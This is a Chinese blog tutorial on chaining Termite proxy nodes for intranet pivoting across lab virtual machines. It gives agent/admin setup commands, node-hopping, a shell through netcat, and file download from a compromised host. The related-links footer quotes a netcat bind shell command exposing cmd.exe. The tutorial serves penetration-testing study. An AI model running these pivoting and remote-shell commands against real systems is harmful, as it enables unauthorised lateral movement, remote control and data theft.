内网代理穿透2:termite代理穿透

最新推荐文章于 2024-03-29 09:46:56 发布
最新推荐文章于 2024-03-29 09:46:56 发布
阅读量4.2k 收藏 4
点赞数 1
分类专栏: 内网渗透学习 文章标签: 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/da_chuan_chuan/article/details/122715438
版权

文章目录

前言

termite工具前身是ew,在复杂的内网环境他的使用很人性化。操作也是十分便捷。

程序主要分为两部分,控制端[admin]和代理端节点[agent],当代理节点链路形成之后我们就可以直接通过控制端调用任意节点,就不需要向传统的那样一级一级往下代理了。

实验环境:
termite工具在Windows和Linux都可以使用,这里为了方便只实验Windows环境。我在虚拟机中搭建了2台win8,1台win7。win8_1两块网卡一块VMnet0模式,一块使用VMnet1,win8_2两块网卡,一块VMnet1,一块VMnet2,win7一块网卡VMnet2。攻击主机使用win7,网卡为VMnet0

一、基础选项用法

工具选项用途: 
-l   #指定本地socks端口,等待远程连接
-c   #指定 远程socks机器IP
-p   #指定远程socks机器端口

二、具体使用

1、建立代理节点

使用这个工具的前提是已经拿下了对应的目标机器可以进行操作。
代理端节点启动一个agent服务:

./agent -l 9999  #这里的agent需要在具体的系统中使用具体的agent
agent_Win32.exe -l 9999 #本次实验所用

#剩余的win8_2和win7也如同上面的一样,只是端口不同,我分别换成了9991和9992

在这里插入图片描述

管理端启动一个admin服务:

./admin -c 0.0.0.0 -p 9999 #对应的管理端的系统就使用具体的admin
admin_Win32.exe -c 192.168.28.76 -p 9999 #具体的PC

在这里插入图片描述

这里因为win8_2和win7,我的攻击机都无法连接,所以我需要借助我们连上的win8_1来连接 win8_2,借助win8_2来连接win7,因为他们两两相互接通的。具体方法如下:

#在前面的基础上往下走:
goto 1 #进入win8_1的控制界面
conncet 192.168.89.134 9991

在这里插入图片描述连接win7也是同理,需要借助win8_2,具体方法如下:

goto 2 #进入win8_2的控制模式
connect 192.168.75.131 9992

在这里插入图片描述
通过上述步骤我们就连通了这三台内网主机。

2、具体攻击

1、与nc联动,加入我们要获取shell,需要来借助nc工具,具体使用如下:

#termite工具操作:
goto 2 #想获取2号机的shell控制端
shell 8888 #nc需要连接的端口

#nc工具操作:
nc.exe 127.0.0.1 8888

在这里插入图片描述在这里插入图片描述

2、将远程文件下载到本地

goto 1
downfile 1.txt 2.txt #下载1.txt并重命名为2.txt

在这里插入图片描述

它还有上传 文件这些功能,这里就不一一介绍了,这里给一个官方用法链接:官方用法链接
工具下载链接:termite工具下载

总结

该工具在内网渗透中觉得还是有记录价值,因为它这种管理起来十分便利,我要使用那一台主机直接goto就好了。上述记录有错误的地方欢迎各位大佬批评指正。如有侵权请联系我

大川儿*
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
termite:使用它可以快速进行终端应用项目
04-03
白蚁 使用它可以快速进行终端应用项目
Termite最新版1.8.4.zip
02-27
Termite 是EW的最新版,具有多平台支持、跳板机互联、正反向级联、小巧无依赖、和内置Shell令主机管理更方便等特性,分为管理端admin和客户端agent。
探秘 Termite:一款强大的终端模拟器
最新发布
gitblog_00013的博客
03-29 257
探秘 Termite:一款强大的终端模拟器 项目地址:https://gitcode.com/rootkiter/Termite Termite 是一个轻量级、高效的终端模拟器,由开发者 rootkiter 创建并维护。这款开源软件以其简洁的设计和出色的性能,在众多终端模拟器中脱颖而出。通过以下的技术分析,让我们一起了解 Termite 如何满足你的日常开发和管理需求。 项目简介 Termite ...
内网端口 转发 穿透 工具简介
whatday的专栏
10-04 6752
目录 一、LCX 1.lcx 内网端口转发(类似于SSH远程转发-R) 2.本地端口转发(类似于SSH本地转发-L) 二、nc反弹 正向连接 反向连接 三、socks代理工具 (1)Earthworm (2)Termite (3)Dog Tunnel (4)reGeorg (5)sSocks (6)Tunna 四、内网穿透 (1)frp (2)ngrok (3)其他内网穿透平台 一、LCX lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Wi
内网渗透系列:内网穿透(隧道)学习
闵行小鱼塘
06-30 8463
本文试图学习整理内网穿透技术
内网代理穿透
huangyongkang666的博客
03-31 2895
内网代理穿透 实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要介绍Termite对模拟内网进行操作,Termite 是EW(EarthWorm)的最新版 1.nc工具使用 windows中使用nc,需要安装nc.exe 靶机 nc.exe -l -p 4444 -t -e cmd.exe 攻击机 nc.exe 192.168.1.1 4444 linux中使用nc,见工具使用栏中的netcat使用博客 2.termite使用 ​ 一款极度小巧灵活的跳板
内网穿透:frp、termite、异地组网、安卓手机搭建web
热门推荐
freeking101的博客
01-30 1万+
内网穿透 --- frp、termite、Android手机搭建个人服务器
Termite-20180926.zip
09-16
内网穿透神器,找了很久,留作备用吧,官网已经下载不到了
内网多级穿透之工具使用(termite)
1ance's blog
11-04 1245
00x1 模拟内网环境:一台windows2003,一台windows2008,物理机windows10。 网段分布: 主机 IP windows10 192.168.60.98 windows2003 192.168.255.136/192.168.72.128 windows2008 192.168.72.129 win10可与win2003互通,但不能访问win2008;win2003可与win2008互通;且win2003出网,win2008不出网。 (即模拟win10为
Termite-Beta1.0跳板机_WORM_SameSame_termite_Termite.exe_
10-02
Termite .....same as worm..... Penetrate server
内网渗透的利器,原版作者已经下架,有需要的自己下载吧,内附简单使用说明
10-02
Termite是一款内网穿透利器,分为管理端admin和代理端agent。 它支持多平台、跳板机间正反向级联、内置shell管理等。 本文将介绍该工具在多种场景下的使用及其功能。 Termite是一款内网穿透利器,分为管理端admin和代理端agent。 它支持多平台、跳板机间正反向级联、内置shell管理等。
termite1.8.4-Linux/MacOS/Windows/x86/x64/arm/mips
09-27
尊贵的蚯蚓,作者撤了下载,穿越美墨土墙利器,现在只要3分钱 Termite 是EW的最新版,具有多平台支持、跳板机互联、正反向级联、小巧无依赖、和内置Shell令主机管理更方便等特性,分为管理端admin和客户端agent。
Termite-20180926.rar
05-16
原作者已经下架,之前找这个新版termite费了笔者不少力气,如今分享给大家。 版本:free 1.8.4
termite.zip
12-13
termite下载内网穿透内网端口转发
Termite-20180926 版本.zip
03-25
原作者已经下架,版本:free 1.8.4,卖的太贵了,哪有那么多的积分。。。。所以还是低一点比较好
内网安全攻防:渗透测试实战指南》读书笔记(三):隐藏通信隧道技术
闵行小鱼塘
04-09 4707
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法,并对常见的SOCKS代理工具及内网上传/下载方法进行了解说
内网渗透-内网代理穿透内网横向移动
lza20001103的博客
09-23 2039
内网代理穿透内网横向移动 文章目录内网代理穿透内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理
termite v1.8.4
10-19
Termite是一个开源的终端仿真器,适用于Linux操作系统。它是基于VTE库(Virtual Terminal Emulator)开发的,具有很多优秀的特性。 Termite v1.8.4是Termite的一个版本,具体来说,它是在v1.8.3版本的基础上进行了一些改进和修复。 在Termite v1.8.4中,主要的改进之一是优化了滚动性能。以前版本中,当终端内容较多时,滚动操作可能会比较卡顿。而在v1.8.4中,这个问题得到了解决,现在滚动操作更加流畅。 此外,这个版本还修复了一些已知的bug,提高了终端的稳定性和可靠性。例如,修复了一个可能导致Termite崩溃的问题,以及修复了某些特定情况下文本选择操作不正确的bug。 此外,Termite v1.8.4还引入了对SIXEL图像的支持。SIXEL是一种六位图像格式,支持图像的显示和保存。通过这个功能,Termite可以更好地处理和显示图像,提供更好的用户体验。 综上所述,Termite v1.8.4在性能优化、bug修复和新功能引入方面都有所提升。它是一个稳定可靠的终端仿真器,为用户提供了更好的使用体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值